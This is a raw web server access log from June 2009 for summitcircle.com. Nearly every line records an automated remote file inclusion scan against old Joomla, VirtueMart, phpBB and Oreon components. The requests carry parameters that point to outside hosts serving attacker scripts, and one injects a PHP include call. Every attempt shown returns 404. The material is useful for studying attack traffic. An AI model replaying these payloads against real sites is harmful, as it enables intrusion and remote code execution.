195.34.78.110 - - [28/Jun/2009:23:49:55 -0700] "GET /logs/access.log//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:23:50:02 -0700] "GET /logs/access.log//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
65.55.107.181 - - [28/Jun/2009:23:52:32 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:38 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:38 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:38 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:38 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:39 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:39 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:49 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:50 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:50 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:50 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:50 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:52:51 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:52:55 -0700] "GET /logs/access_090413.log/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:53:35 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:54:02 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:54:03 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:54:03 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:54:09 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:54:09 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:54:09 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:54:14 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:54:14 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
79.49.190.214 - - [28/Jun/2009:23:54:18 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.psb-fenster-und-tueren.de/aidie1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
79.49.190.214 - - [28/Jun/2009:23:54:18 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.psb-fenster-und-tueren.de/aidie1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
79.49.190.214 - - [28/Jun/2009:23:54:18 -0700] "GET /logs/access_090222.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.psb-fenster-und-tueren.de/aidie1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:54:24 -0700] "GET /logs/access_081201.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:54:28 -0700] "GET /logs/access_081201.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [28/Jun/2009:23:54:34 -0700] "GET /logs/access_090413.log/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:55:01 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:55:08 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:56:03 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:56:04 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:56:04 -0700] "GET /logs/access_081201.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:56:14 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:56:14 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:56:14 -0700] "GET /logs/access.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:56:17 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:56:17 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:56:17 -0700] "GET /logs/access.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:56:17 -0700] "GET /logs/access_081201.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
80.93.48.103 - - [28/Jun/2009:23:56:19 -0700] "GET /logs/access_081201.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:23:56:34 -0700] "GET /logs/access_081201.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:23:56:57 -0700] "GET /logs/access_081201.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
79.49.190.214 - - [28/Jun/2009:23:57:03 -0700] "GET /logs/access_090202.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.psb-fenster-und-tueren.de/aidie1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.45.56.47 - - [29/Jun/2009:00:00:12 -0700] "GET /include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [29/Jun/2009:00:00:12 -0700] "GET /logs/access_090118.log//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [29/Jun/2009:00:00:12 -0700] "GET /logs//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
194.165.34.48 - - [29/Jun/2009:00:00:59 -0700] "GET /include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.48 - - [29/Jun/2009:00:00:59 -0700] "GET /logs/access_090118.log//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.48 - - [29/Jun/2009:00:00:59 -0700] "GET /logs//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
222.122.6.62 - - [29/Jun/2009:00:01:36 -0700] "GET /logs/access_090118.log//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.122.6.62 - - [29/Jun/2009:00:01:36 -0700] "GET /logs//include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.122.6.62 - - [29/Jun/2009:00:01:36 -0700] "GET /include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:01:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:01:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:01:42 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:01:42 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:01:42 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:01:43 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:03:41 -0700] "GET /logs/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:03:41 -0700] "GET /postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:03:42 -0700] "GET /logs/access.log%20%20/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.93.147.154 - - [29/Jun/2009:00:03:58 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.93.147.154 - - [29/Jun/2009:00:03:58 -0700] "GET /logs/access_090119.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.93.147.154 - - [29/Jun/2009:00:03:59 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.93.147.154 - - [29/Jun/2009:00:03:59 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.93.147.154 - - [29/Jun/2009:00:03:59 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.93.147.154 - - [29/Jun/2009:00:03:59 -0700] "GET /logs/access_090119.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.93.147.154 - - [29/Jun/2009:00:05:06 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.93.147.154 - - [29/Jun/2009:00:05:08 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:05:13 -0700] "GET /logs/access.log/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:07:05 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:07:05 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [29/Jun/2009:00:07:05 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:07:15 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:07:15 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:07:15 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:07:17 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:07:18 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:07:18 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
66.235.124.132 - - [29/Jun/2009:00:09:30 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "-" "www.summitcircle.com"
66.235.124.132 - - [29/Jun/2009:00:09:30 -0700] "GET /wsnlinks/skypephones.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1" "www.summitcircle.com"
218.232.105.116 - - [29/Jun/2009:00:10:08 -0700] "GET /logs/access.log///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [29/Jun/2009:00:10:08 -0700] "GET /logs///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [29/Jun/2009:00:10:08 -0700] "GET //components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [29/Jun/2009:00:10:19 -0700] "GET /administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [29/Jun/2009:00:10:22 -0700] "GET /logs///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [29/Jun/2009:00:10:22 -0700] "GET //components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.232.105.116 - - [29/Jun/2009:00:10:22 -0700] "GET /logs/access_090413.log///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [29/Jun/2009:00:10:23 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
122.153.28.140 - - [29/Jun/2009:00:10:23 -0700] "GET /logs//administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
60.43.229.5 - - [29/Jun/2009:00:12:06 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
60.43.229.5 - - [29/Jun/2009:00:12:06 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
60.43.229.5 - - [29/Jun/2009:00:12:06 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
94.23.2.21 - - [29/Jun/2009:00:12:37 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "summitcircle.com"
